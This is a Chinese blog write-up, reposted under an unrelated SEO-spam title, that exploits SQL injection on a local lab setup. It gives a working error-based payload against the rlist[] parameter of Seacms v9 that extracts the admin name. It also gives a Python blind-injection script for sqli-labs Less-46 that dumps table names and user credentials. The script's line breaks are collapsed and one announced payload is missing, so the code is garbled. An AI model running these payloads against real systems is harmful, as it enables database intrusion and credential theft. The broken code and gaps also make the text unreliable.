您的位置:首页 > 科技 > 能源 > 广州网站优化公司排名_湖南郴州今日头条新闻_网络推广外包想手机蛙软件_seo关键词排名报价

广州网站优化公司排名_湖南郴州今日头条新闻_网络推广外包想手机蛙软件_seo关键词排名报价

2025/4/1 10:49:09 来源:https://blog.csdn.net/2301_77151645/article/details/145909181  浏览:    关键词:广州网站优化公司排名_湖南郴州今日头条新闻_网络推广外包想手机蛙软件_seo关键词排名报价
广州网站优化公司排名_湖南郴州今日头条新闻_网络推广外包想手机蛙软件_seo关键词排名报价

 一、Seacms v9 SQL 注入漏洞分析与利用

(1)漏洞概述
Seacms(海洋 CMS)是一款基于 PHP5.X + MySQL 架构的视频点播系统,被广泛用于影视站点管理。在 Seacms v9 版本中,./comment/api/index.php 存在 SQL 注入漏洞,漏洞参数为 $rlist,可用于执行 SQL 注入攻击。

(2)漏洞成因
由于 Seacms v9 是开源的,我们可以直接查看其源码,发现 rlist[] 参数未经过严格的过滤和预处理,导致攻击者可以构造恶意 SQL 语句,实现数据库查询操作。

(3) 数据库结构
Seacms v9 版本使用的数据库默认名称为 seacms,其中管理员信息存储在 sea_admin 表。

payload:
http://127.0.0.1/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20updatexml%20(1,concat_ws(0x20,0x5c,(select%20name%20from%23%0asea_admin%20limit%200,1)),1),%20@`%27`

2.插入数据: 

INSERT INTO sea_comment (uid, v_id, typeid, username, ip, ischeck, dtime, msg, m_type, reply, agree, anti, pic, vote
) VALUES 
(123, 456, 1, 'user1', '192.168.1.2', 1, UNIX_TIMESTAMP(), 'Nice video!', 0, 1, 5, 0, '', 3),
(124, 457, 2, 'user2', '192.168.1.3', 0, UNIX_TIMESTAMP(), 'Great content!', 0, 0, 8, 1, '', 2);

管理员用户密码注入:

payload

最后由md5解密得管理员账号密码为:admin

二,order by +布尔盲注

 代码如下:

import requests
from bs4 import BeautifulSoupdef get_username(response_text):soup = BeautifulSoup(response_text, 'html.parser')username = soup.select_one('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')return username.text if username else ''def boolean_sqli_exploit(payload_template):result = ''i = 1while True:left, right = 32, 127while left < right:mid = (left + right) // 2url = payload_template.format(index=i, char_value=mid)resp = requests.get(url)if get_username(resp.text) == 'Dumb':left = mid + 1else:right = midif left == 32:breakresult += chr(left)i += 1print(result)return resultdef inject_database():payload = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr(database(),{index},1))>{char_value},id,username) -- "return boolean_sqli_exploit(payload)def inject_tables():payload = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1))>{char_value},id,username) -- "return boolean_sqli_exploit(payload)def inject_columns():payload = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{index},1))>{char_value},id,username) -- "return boolean_sqli_exploit(payload)def inject_data():payload = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) from users),{index},1))>{char_value},id,username) -- "return boolean_sqli_exploit(payload)if __name__ == '__main__':# inject_database()# inject_tables()# inject_columns()inject_data()

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com